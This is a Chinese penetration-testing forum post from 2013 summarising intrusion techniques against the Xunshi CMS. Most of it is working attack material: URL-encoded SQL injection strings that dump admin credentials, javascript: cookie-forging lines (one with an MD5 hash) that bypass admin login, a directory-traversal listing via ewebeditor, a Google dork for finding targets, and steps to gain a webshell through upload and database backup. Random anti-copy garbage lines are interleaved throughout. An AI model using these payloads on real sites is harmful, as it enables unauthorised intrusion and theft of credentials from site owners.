中国网络渗透测试联盟
标题:
讯时漏洞总结
[打印本页]
作者:
admin
时间:
2013-1-16 21:25
标题:
讯时漏洞总结
by:血封忆尘
( L6 _9 w6 K- s1 _: a
9 [( R; j9 M0 g' j
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
) R* n$ ^# n2 b- {6 j
: t! o+ Z1 J& |0 M% s
以下本文总结来自黑防去年第9期杂志上的内容...
9 f1 a+ f- Z( ` R
! S3 H5 B0 ^( p
先说一个注入吧:
http://www.political-security.com/news_more.asp?lm=2
%41nd 1=2 union %53elect 1,2,3,0x3b%
& y7 s% t8 P8 z. G; X2 c
2 Y/ ?; Z/ r4 w, V: O4 y2 K
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
# v: j* g, ^; n% ?! ^6 W0 ] v! T
* C- C6 B( N/ ?! Y- K* e$ a
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
) }( ]: x s% s7 j; P. g+ u
这里一个注入
# w1 \, K, d4 i7 E1 o/ E% O
; p0 ?5 D6 b- V: T* v
效果如图:
1 P/ B: t6 I: }1 B2 w
" y5 |/ H0 s5 w% s6 n
' ]( ^. R$ r. [: x0 M8 i( W
# D: L3 {; v3 v" ?- a; \; |: f
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
6 ]# O3 \; h% _: i) r# K9 G$ d. b
/ Q: l- B1 [3 `) E! M' {7 w0 R7 c
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
( f+ B* `: H# s7 y, B
! Q* A: f5 g: ?5 W
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
4 T7 |; z8 K2 O% \7 T7 M5 Q
N% o/ c+ B Q. ~; L* ~2 t
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
/ y" F" G# E5 S
' X. u2 v7 l* P5 U) h" V$ c$ x
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
+ h1 G, |7 S1 K! ]* ]
+ J+ H7 C. e+ N9 k" l' H d
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
' V* g1 `/ L4 ^$ y, R' c
/ z2 S f& w0 E# Y
访问这页面来列目录..步骤如下:
+ D2 C( f& v1 ]" ` }# n/ k/ S
. B u3 Z8 x% i& |$ ~
javascript:alert(document.cookie="admindj=1")
. ~9 Q0 }& V2 Q) A2 ]1 Z
% B. m* f: @: s/ c/ N' B" f8 {4 E
http://www.political-security.co ... asp?id=46&dir=../..
# N$ [' V& Z0 K$ \
) I# F0 {9 x G! a' u3 x# g
效果如图:
, A2 ?' W V. I# w3 |
" v; @1 A' Z: B6 a
4 [ ^$ a6 v, C
$ f- q& J/ i% w* \9 d$ Z, W5 e
这样全站目录都能瞧了..找到后台目录..进去..
8 K- Q' _$ Y; Q b8 |/ ~
8 c% ~2 ?% H% P0 J6 W
那么进了后台怎么拿shell??上传--备份就ok了..
; y8 J2 N1 }% A% i
+ ~$ u5 _6 d d+ b. E, Z+ P
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
S! X( Q7 a. \* f2 \
1 ]4 y) D# m1 U% T
这个我也碰到过一次..你都可以通过列目录来实现..
6 H2 y d3 M3 e# Y7 u7 Z% H2 P
5 D% ~* V8 b* `: C
javascript:alert(document.cookie="admindj=1")
/ C9 R1 Y- ^* U, z0 T8 `
- p9 n9 ^$ u/ b, N
http://www.political-security.co ... p?action=BackupData
& D2 O! _/ x& s% t& X
0 V/ V# j" w* O( a! h
备份ok..
" i" z, F& T. N1 G
6 }9 r, B% G7 n( }; y: L8 h
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
9 K; j8 J1 d# A; `* J1 Q @. ~
e' V5 g* d. h6 W% Q' U0 W1 A' F
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
- t- U" K# w: P7 T# Z
4 O3 K6 S0 U3 b3 j6 S8 ~
然后访问此页面进行注入..步骤如下:
: a/ n1 j* \' {" {+ {* m
0 G* e {) n1 p1 ], I: z7 u
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
$ _* ~0 K2 k C/ M
: z! @4 ^9 d2 m' R7 y8 H* f
然后请求admin/admin_chk.asp页面
# y! g6 [; A8 {/ C! q0 E/ x
+ `8 ^- P2 q/ A
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
- P1 s4 E4 K9 x% N8 [4 w
4 G* v4 Y( U$ B3 L+ x2 _1 E
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
3 ?( |8 J. M) b: O, n
7 [8 e9 _# z/ }1 A: r: s
效果如图所示:
* r$ V$ N/ E9 f5 X$ ~8 ]
; O& @& R4 B- `4 i' |/ r( c1 q
0 n' d/ a# Y# t. R4 R, f" j
j& }7 |* f7 F. B, W
讯时漏洞2
" j: ~# w# ~8 T2 [2 |& N* i
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
$ M! ?+ F- V: Y2 E
3 k1 H7 F) s3 }& b; [, Y
1、/admin/admin_news_pl_view.asp?id=1
$ T4 m/ n+ ~% Q. {) u' g; k
//id任意 填入以下语句
" F" j: H! _: V5 T# l- S1 N
0 Z8 v( n+ f8 ^7 C- n- ]' @
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
3 q- m5 P& Z5 J$ m! Z, X9 Z: X+ e
: u1 A8 q. u2 i! e8 K) `; @
, k1 F5 n5 F. X% u' o
+ f; E9 ?7 g/ X3 d) h. z' m
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
! a+ t; ]; @# ~. W
# f# q0 ^7 s( C6 a& J+ `
7 l" \5 X. {3 y1 v# H
/ U7 A @9 p; d1 k
爆出管理员帐号和密码了
9 P+ d& k, T. I+ Y- O" r$ H2 ~
4 d. z5 j7 |4 e% H3 B
- H/ O: j2 J. E2 V0 }( I9 s
3 p3 w' Q; v! K# k
4、cookies进后台
7 x+ R' Y) ]9 [$ Y1 a9 J
* D$ U3 W5 `/ G) m. l, A5 [
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
1 @6 B2 u, I! R/ S
. S( s! {* }, n! \( [* q( G
5 W- {/ c0 U. M' u: A7 E0 c
* R- \* z! J }9 {
5、后台用了cookie验证,直接访问
http://www.political-security.com/admin/admin_index.asp
就OK了!
/ X; w2 m, J% K7 P& Q5 B& L! x
p3 e; Z& k }
6 x' T+ C9 [1 E. \
6 T: y' W$ }! }" j
6、后台有上传和备份取SHELL不难。
4 `1 |# M7 p; |5 j0 g/ ]3 x1 Q
' o0 _" X, x$ C$ y& r% P1 K3 c2 |8 s
7、讯时还有个列目录漏洞:
http://www.political-security.co ... asp?id=46&dir=../..
9 c; i2 A7 `! h- C2 e
8 f" R& p4 J5 b3 h, _( `. a# b
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问
http://www.political-security.com
/admin/admin_db_backup.asp?action=BackupData
,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
: I( {5 G: Z6 h& u* c4 N! b
0 e% R2 B: `, I- |3 w# x# F) ]
8 O$ A2 z6 k. s; [4 e2 r b* R
V M) A, k& E% L/ n7 ?5 I
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2